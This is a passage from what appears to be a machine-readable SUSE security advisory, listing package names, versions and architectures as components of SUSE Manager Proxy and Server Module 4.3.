"name": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64 as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64"
},
"product_reference": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-4.3.29-150400.3.42.8.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch"
},
"product_reference": "spacecmd-4.3.29-150400.3.42.8.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
},
"product_reference": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-check-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "spacewalk-check-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-setup-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch"
},
"product_reference": "spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch"
},
"product_reference": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch"
},
"product_reference": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch"
},
"product_reference": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.3-150400.5.52.3.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch"
},
"product_reference": "cobbler-3.3.3-150400.5.52.3.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-formula-0.11.0-150400.3.21.4.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch"
},
"product_reference": "grafana-formula-0.11.0-150400.3.21.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.ppc64le as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le"
},
"product_reference": "inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.s390x as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x"
},
"product_reference": "inter-server-sync-0.3.5-150400.3.36.13.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.x86_64 as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64"
},
"product_reference": "inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
},
"product_reference": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le"
},
"product_reference": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x"
},
"product_reference": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64 as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64"
},
"product_reference": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch"
},
"product_reference": "saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-4.3.29-150400.3.42.8.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch"
},
"product_reference": "spacecmd-4.3.29-150400.3.42.8.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-app-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-server-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch"
},
"product_reference": "spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-base-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
},
"product_reference": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-config-4.3.14-150400.3.18.6.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch"
},
"product_reference": "spacewalk-config-4.3.14-150400.3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-html-4.3.42-150400.3.52.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch"
},
"product_reference": "spacewalk-html-4.3.42-150400.3.52.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-4.3.82-150400.3.96.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch"
},
"product_reference": "spacewalk-java-4.3.82-150400.3.96.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-config-4.3.82-150400.3.96.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch"
},
"product_reference": "spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-lib-4.3.82-150400.3.96.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch"
},
"product_reference": "spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch"
},
"product_reference": "spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch"
},
"product_reference": "spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-utils-4.3.22-150400.3.29.2.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch"
},
"product_reference": "spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch"
},
"product_reference": "spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.3.39-150400.3.58.5.ppc64le as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le"
},
"product_reference": "susemanager-4.3.39-150400.3.58.5.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.3.39-150400.3.58.5.s390x as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x"
},
"product_reference": "susemanager-4.3.39-150400.3.58.5.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.3.39-150400.3.58.5.x86_64 as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64"
},
"product_reference": "susemanager-4.3.39-150400.3.58.5.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch"
},
"product_reference": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch"
},
"product_reference": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-docs_en-4.3.14-150400.9.66.2.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch"
},
"product_reference": "susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch"
},
"product_reference": "susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-schema-4.3.27-150400.3.45.11.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch"
},
"product_reference": "susemanager-schema-4.3.27-150400.3.45.11.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-schema-utility-4.3.27-150400.3.45.11.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch"
},
"product_reference": "susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-sls-4.3.45-150400.3.55.4.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch"
},
"product_reference": "susemanager-sls-4.3.45-150400.3.55.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-sync-data-4.3.21-150400.3.35.2.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch"
},
"product_reference": "susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.ppc64le as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le"
},
"product_reference": "susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.s390x as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x"
},
"product_reference": "susemanager-tools-4.3.39-150400.3.58.5.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.x86_64 as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64"
},
"product_reference": "susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-config-modules-4.3.45-150400.3.55.4.noarch as component of SUSE Manager Server Module 4.3",
